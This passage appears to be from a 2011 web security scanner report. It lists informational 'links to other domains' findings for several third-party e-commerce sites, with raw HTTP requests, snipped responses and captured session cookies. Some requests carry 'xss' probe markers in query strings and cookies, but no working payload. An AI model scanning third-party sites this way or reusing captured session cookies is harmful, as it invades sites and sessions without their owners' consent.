Cookie: s_cc=true; s_nr=1315342445639; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahpf4%25253Aregister%252520now%252520for%252520oracle%252520openworld%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35920884238154043,0:1)
Content-Length: 3470
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:54:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/html;
...[SNIP]...
<!-- Start SiteCatalyst code -->
   <script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_ocom.js"></script>    
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

19.110. http://www.oraclecfo.com/Authentication/Login_w.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oraclecfo.com
Path:   /Authentication/Login_w.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /Authentication/Login_w.html?url=LwAAAG8AAAByAAAAYQAAAGMAAABsAAAAZQAAADAAAAA5AAAALgAAAGkAAABjAAAAbwAAAA== HTTP/1.1
Host: www.oraclecfo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hbwp4rmax55h0c45eof5yo45; OracleCFOCountry=282; _pk_ref.3.469e=%5B%22%22%2C%22%22%2C1315343453%2C%22http%3A%2F%2Fwww.oracle.com%2Findex.html%23%22%5D; _pk_id.3.469e=39092d4d809db2e1.1315343453.1.1315343453.1315343453; _pk_ses.3.469e=*; OracleCFOLanguage=46; OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:11:22 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 19964


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<p>
   <a href="http://www.oracle.com/us/corporate/index.htm" target="_blank">About Oracle</a>
...[SNIP]...
</a>
   |
   <a href="http://www.oracle.com/html/copyright.html" target="_blank">Legal Notices</a>
   |
   <a href="http://www.oracle.com/html/terms.html" target="_blank">Terms of Use</a>
   |
   <a href="http://www.oracle.com/html/privacy.html" target="_blank">Privacy</a>
...[SNIP]...
<p><img src="http://stats.volume.co.uk/piwik.php?idsite=3" style="border:0" alt="" /></p>
...[SNIP]...

19.111. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oraclecfo.com
Path:   /Main/Solutions/Solutions_w.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /Main/Solutions/Solutions_w.html?mode=1&articleID=2243&categoryID=82 HTTP/1.1
Host: www.oraclecfo.com
Proxy-Connection: keep-alive
Referer: http://www.oraclecfo.com/Main/Home/Home_w.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hbwp4rmax55h0c45eof5yo45; _pk_ref.3.469e=%5B%22%22%2C%22%22%2C1315343453%2C%22http%3A%2F%2Fwww.oracle.com%2Findex.html%23%22%5D; _pk_id.3.469e=39092d4d809db2e1.1315343453.1.1315343453.1315343453; _pk_ses.3.469e=*; OracleCFOCountry=282; OracleCFOLanguage=46; OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:12:24 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 50539


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<p>
   <a href="http://www.oracle.com/us/corporate/index.htm" target="_blank">About Oracle</a>
...[SNIP]...
</a>
   |
   <a href="http://www.oracle.com/html/copyright.html" target="_blank">Legal Notices</a>
   |
   <a href="http://www.oracle.com/html/terms.html" target="_blank">Terms of Use</a>
   |
   <a href="http://www.oracle.com/html/privacy.html" target="_blank">Privacy</a>
...[SNIP]...
<p><img src="http://stats.volume.co.uk/piwik.php?idsite=3" style="border:0" alt="" /></p>
...[SNIP]...

19.112. http://www.rayalab.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rayalab.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /?gclid=CMuoq_OIiasCFRligwodfwxd4w HTTP/1.1
Host: www.rayalab.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:36 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Sat, 19 Mar 2011 16:04:36 GMT
ETag: "152efb-1e857-49ed80d11d5a1"
Accept-Ranges: bytes
Content-Length: 125015
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Raya Cosmetic Manuf
...[SNIP]...
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<li><a href="http://www.onlineconversion.com/" class="rayalab_text">Conversions</a>
...[SNIP]...
<li><a href="http://www.timeanddate.com/worldclock/full.html" class="rayalab_text">World Clock</a>
...[SNIP]...
<li><a href="http://www.timeanddate.com/calendar/" class="rayalab_text">Calendar</a>
...[SNIP]...
<li><a href="http://www.wunderground.com/US/CA/San_Francisco.html" class="rayalab_text">World Weather</a>
...[SNIP]...
_text">In addition, her one room facial salon became Raya Day Spa, one of the largest 3 story (12,000 ft sq.-1,200 sq.m) and most successful and affordable Day Spa's in Bevery Hills/ Los Angeles area <a href="http://www.rayaspa.com" class="rayalab_text"><u>
...[SNIP]...
<td align="left" height="30px" colspan="2"><a href="http://www.beautypackaging.com/articles/2006/12/contracting-out-beauty.php" style="text-decoration:none"><font color="#000000">
...[SNIP]...
<td class="rayalab_text">RAYA Day Spa <a href="http://www.rayaspa.com" class="rayalab_text"><u>
...[SNIP]...
<td align="center"><a href="http://www.sephora.com" target="_blank" class="rayalab_text"><strong>
...[SNIP]...
</a> <a href="http://www.diamondbeauty.com" target="_blank" class="rayalab_text"><strong>
...[SNIP]...
<td align="center"><a href="http://www.dermatologistrx.com" target="_blank" class="rayalab_text"><strong>
...[SNIP]...
</a> <a href="http://www.essentialdayspa.com" target="_blank" class="rayalab_text"><strong>
...[SNIP]...
</a> <a href="http://www.bestskincare.com" target="_blank" class="rayalab_text"><strong>
...[SNIP]...
<td align="center"><a href="http://www.skinstore.com" target="_blank" class="rayalab_text"><strong>
...[SNIP]...
</a> <a href="http://www.joybeauty.com" target="_blank" class="rayalab_text"><strong>
...[SNIP]...
</a> <a href="http://www.dermalogica.com" target="_blank" class="rayalab_text"><strong>
...[SNIP]...
<li><a href="http://www.onlineconversion.com/" class="rayalab_text">Conversions</a>
...[SNIP]...
<li><a href="http://www.timeanddate.com/worldclock/full.html" class="rayalab_text">World Clock</a>
...[SNIP]...
<li><a href="http://www.timeanddate.com/calendar/" class="rayalab_text">Calendar</a>
...[SNIP]...
<li><a href="http://www.wunderground.com/US/CA/San_Francisco.html" class="rayalab_text">World Weather</a>
...[SNIP]...

19.113. http://www.resourcepoint.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcepoint.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /?string=xss HTTP/1.1
Host: www.resourcepoint.net
Proxy-Connection: keep-alive
Referer: http://www.resourcepoint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=188034475.; __utmxx=188034475.; WT_FPC=id=239e81f8b695866baab1315330543768:lv=1315330543768:ss=1315330543768; __utma=188034475.914778929.1315341149.1315341149.1315341149.1; __utmb=188034475.3.10.1315341149; __utmc=188034475; __utmz=188034475.1315341149.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; name=xss

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 01 Jun 2011 11:14:04 GMT
Accept-Ranges: bytes
ETag: "0a61544d20cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:36:17 GMT
Content-Length: 63953

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Resource Point . Experts in eCommerce, portal development & content management</title>
<meta http-equiv="Conten
...[SNIP]...
<noscript><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="460" height="162">
<param name="movie" value="index-ani.swf">
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script><noscript><div class="statcounter"><a href="http://www.statcounter.com/free_hit_counter.html" target="_blank"><img class="statcounter" src="http://c41.statcounter.com/3776433/0/f2e27155/1/" alt="free page hit counter" ></a>
...[SNIP]...

19.114. http://www.sapient.com/en-us/search.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapient.com
Path:   /en-us/search.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /en-us/search.html?search=xss%20contact%20faq%20phone HTTP/1.1
Host: www.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.sapient.com/en-us/search.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; rootItemAlias=SapientNitro; sifrFetch=true; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.3.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; locale=en-us

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:37:16 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40292


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<link rel="icon" href="http://edge.sapient.com/assets/images/favicon.ico"/><link href="http://fonts.googleapis.com/css?family=Droid+Sans" rel="stylesheet" type="text/css" /><link href="http://www.sapient.com/en-us/search.html" rel="canonical" />
...[SNIP]...
<h3>
<a title='Investors' onclick="return true;" href='http://sape.client.shareholder.com/'>Investors </a>
...[SNIP]...
<li class=''><a title='Investors' href='http://sape.client.shareholder.com/'>
Investors
</a>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<!-- placeholder for google analytics and bt scripts -->
<script type="text/javascript" src="https://ads.bridgetrack.com/site/btall_client_src.js?adv=26&amp;site=SAPIENT"></script>
...[SNIP]...

19.115. http://www.shopify.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopify.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g HTTP/1.1
Host: www.shopify.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
ETag: "30c5dcee90df3e2bd9e086c8942ae167"
X-Rack-Cache: miss, store
X-Content-Digest: 070a65f2e8b29b4bcab54cdf40a2829e64cb6f67
X-Runtime: 1231
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 16931
Date: Tue, 06 Sep 2011 15:32:05 GMT
X-Varnish: 1687907058 1687907055
Age: 1
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>


<meta
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://support.myshopify.com/" title="Welcome - Shopify Support"><strong>
...[SNIP]...
<div id="dodovid">
<object type="application/x-shockwave-flash" width="640" height="370" data="http://www.youtube.com/v/2BBL_L4_y94">
<param name="movie" value="http://www.youtube.com/v/2BBL_L4_y94">
...[SNIP]...
<li><a href="http://support.myshopify.com/">Technical Support</a>
...[SNIP]...
</div><a href="http://www.twitter.com/shopify" onclick="pageTracker._setVar('Visit Twitter');">Twitter</a>
...[SNIP]...
</div><a href="http://www.facebook.com/pages/Shopify/20409006880" onclick="pageTracker._setVar('Visit Facebook');">Facebook</a>
...[SNIP]...
<!-- wrapper -->


<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1033599327/?label=PChICMOLtgEQ3_Lt7AM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>


<script type="text/javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

19.116. http://www.tenzing.com/atg-ecommerce-hosting.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenzing.com
Path:   /atg-ecommerce-hosting.asp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 27188
Content-Type: text/html
Set-Cookie: CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00; expires=Tue, 06-Dec-2011 08:00:00 GMT; path=/
Set-Cookie: casestudiesID=3; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script>
   <script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/pages/Tenzing-SaaS-Ecommerce-Hosting/203536313011334" target="_blank">Like Tenzing on Facebook</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/TenzingHosting" target="_blank">Follow Tenzing on Twitter</a>
...[SNIP]...
<li class="linkedin"><a href="http://www.linkedin.com/company/tenzing-managed-it-services" target="_blank">Tenzing on LinkedIn</a>
...[SNIP]...
<li class="rss"><a href="http://feeds.feedburner.com/tenzing-saas-ecommerce-hosting" target="_blank">View Tenzing's News RSS Feed</a>
...[SNIP]...
<div class="follow-us">
                   <a href="http://twitter.com/TenzingHosting" target="_blank">Follow @TenzingHosting</a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/pages/Tenzing-SaaS-Ecommerce-Hosting/203536313011334" target="_blank">Like Tenzing on Facebook</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/TenzingHosting" target="_blank">Follow Tenzing on Twitter</a>
...[SNIP]...
<li class="linkedin"><a href="http://www.linkedin.com/company/tenzing-managed-it-services" target="_blank">Tenzing on LinkedIn</a>
...[SNIP]...
<li class="rss"><a href="http://feeds.feedburner.com/tenzing-saas-ecommerce-hosting" target="_blank">View Tenzing's on RSS News Feed</a>
...[SNIP]...

19.117. http://www.volusion.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.volusion.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /?_kk=%2Becommerce%20%2Bsolution&_kt=3fda914a-c56d-407d-b8c6-0b1636cef4d3&gclid=CKPJnbn4iKsCFSE8gwod-iiK3g HTTP/1.1
Host: www.volusion.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR ADM TAIo PSA PSD IVA CONi TELo OUR DEL SAM OTR LEG UNI"
X-Powered-By: ASP.NET
Content-Length: 30981
Content-Type: text/html
Cache-control: private
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
</style>

<link href="//a248.e.akamai.net/www.volusion.com/a1/c/styles01.css?8" type="text/css" rel="stylesheet" media="all" />
<link href="//install.volusion.com/installer/assets/css/DemoOverlay.css" type="text/css" rel="stylesheet" media="all" />
...[SNIP]...
<body id="home" class="home">
<script src="//a248.e.akamai.net/www.volusion.com/a1/js/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
</p>
<a href="http://www.facebook.com/volusion" class="gs_link" rel="external" style="background-position:0 0">Facebook</a>
<a href="http://twitter.com/#!/volusion" class="gs_link" rel="external" style="background-position:0 -50px">twitter</a>
<a href="http://www.linkedin.com/company/volusion" class="gs_link" rel="external" style="background-position:0 -100px">LinkedIn</a>
<a href="http://www.youtube.com/volusion" class="gs_link" rel="external" style="background-position:0 -150px">YouTube</a>
...[SNIP]...
<div id="from_twit">
<a href="http://twitter.com/#!/volusion" id="twit_link" rel="external">Volusion on Twitter</a>
...[SNIP]...
<![endif]-->

<script src="//a248.e.akamai.net/www.volusion.com/a1/js/js_all_min01.js?4" type="text/javascript"></script>
...[SNIP]...
<li class="f_li"><a href="http://www.icann.org/en/registrars/registrant-rights-responsibilities-en.htm" class="f_a SL">Registrants' Rights</a>
...[SNIP]...
</script>
<script type="text/javascript"src="//www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
<div style="display:inline;"><img height="1" width="1" style="border-style:none;" alt="" src="//www.googleadservices.com/pagead/conversion/1072407790/?label=pHyZCI7nqQEQ7smu_wM&guid=ON&script=0" />
</div>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="//www.googleadservices.com/pagead/conversion/1014025859/?label=6N3SCO2Z6QEQg53D4wM&amp;guid=ON&amp;script=0" />
</div>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="//www.googleadservices.com/pagead/conversion/1022594684/?label=HIUjCIS-2wEQ_JzO5wM&amp;guid=ON&amp;script=0" />
</div>
...[SNIP]...
<!--- start of TRACK_Volusion2011test/Retargeting_Homepage_Nonsecure pixel tag --->
<IMG SRC="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Volusion2011test/Retargeting_Homepage_Nonsecure@Bottom3">
<!--- end of TRACK_Volusion2011test/Retargeting_Homepage_Nonsecure pixel tag --->
...[SNIP]...

19.118. http://www.youtube.com/embed/kPJh9FWuOks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /embed/kPJh9FWuOks

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /embed/kPJh9FWuOks?rel=0&hd=1 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=f_pXTnp7lsc; PREF=fv=10.3.183

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:40:07 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 18441
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>A Look Inside BigCommerce (We&#39;re Hiring!) - YouTube</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflIi8lfi.css">


</head>
...[SNIP]...
<div id="watch-longform-ad-placeholder"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" height="60" width="300"></div>
...[SNIP]...
<p>
Get <a href="http://www.google.com/support/youtube/bin/answer.py?answer=1229982">help setting up HTML5 3D</a>
...[SNIP]...
</div>

<img class="html5-watermark html5-stop-propagation html5-icon hid" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="watermark">
<div class="html5-player-chrome html5-stop-propagation">
...[SNIP]...
t-title="Play" data-alt-title="Pause" onclick=";return false;" type="button" class="html5-play-button yt-uix-button yt-uix-button-player yt-uix-tooltip yt-uix-button-empty" tabindex="3" role="button"><img class="yt-uix-button-icon yt-uix-button-icon-html5" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
tle="Mute" data-alt-title="Unmute" onclick=";return false;" type="button" class="html5-volume-button yt-uix-button yt-uix-button-player yt-uix-tooltip yt-uix-button-empty" tabindex="-1" role="button"><img class="yt-uix-button-icon yt-uix-button-icon-html5" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
ll screen" onclick=";return false;" type="button" class="html5-fullscreen-button html5-control-right yt-uix-button yt-uix-button-player yt-uix-tooltip yt-uix-button-empty" tabindex="11" role="button"><img class="yt-uix-button-icon yt-uix-button-icon-html5" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
e="Shrink" onclick=";return false;" type="button" class="html5-expand-button html5-control-right hid yt-uix-button yt-uix-button-player yt-uix-tooltip yt-uix-button-empty" tabindex="10" role="button"><img class="yt-uix-button-icon yt-uix-button-icon-html5" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
</span><img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""><div class="yt-uix-button-menu yt-uix-button-menu-player" style="display: none;">
...[SNIP]...
tton-reverse yt-uix-button yt-uix-button-player yt-uix-tooltip yt-uix-button-empty" tabindex="8" role="button" aria-pressed="false" aria-expanded="false" aria-haspopup="true" aria-activedescendant=""><img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""><div class="yt-uix-button-menu yt-uix-button-menu-player" style="display: none;">
...[SNIP]...
urn false;" title="Annotations" type="button" class="html5-annotations-button html5-control-right hid yt-uix-button yt-uix-button-player yt-uix-tooltip yt-uix-button-empty" tabindex="7" role="button"><img class="yt-uix-button-icon yt-uix-button-icon-html5" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
</span><img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""><div class="yt-uix-button-menu yt-uix-button-menu-player" style="display: none;">
...[SNIP]...
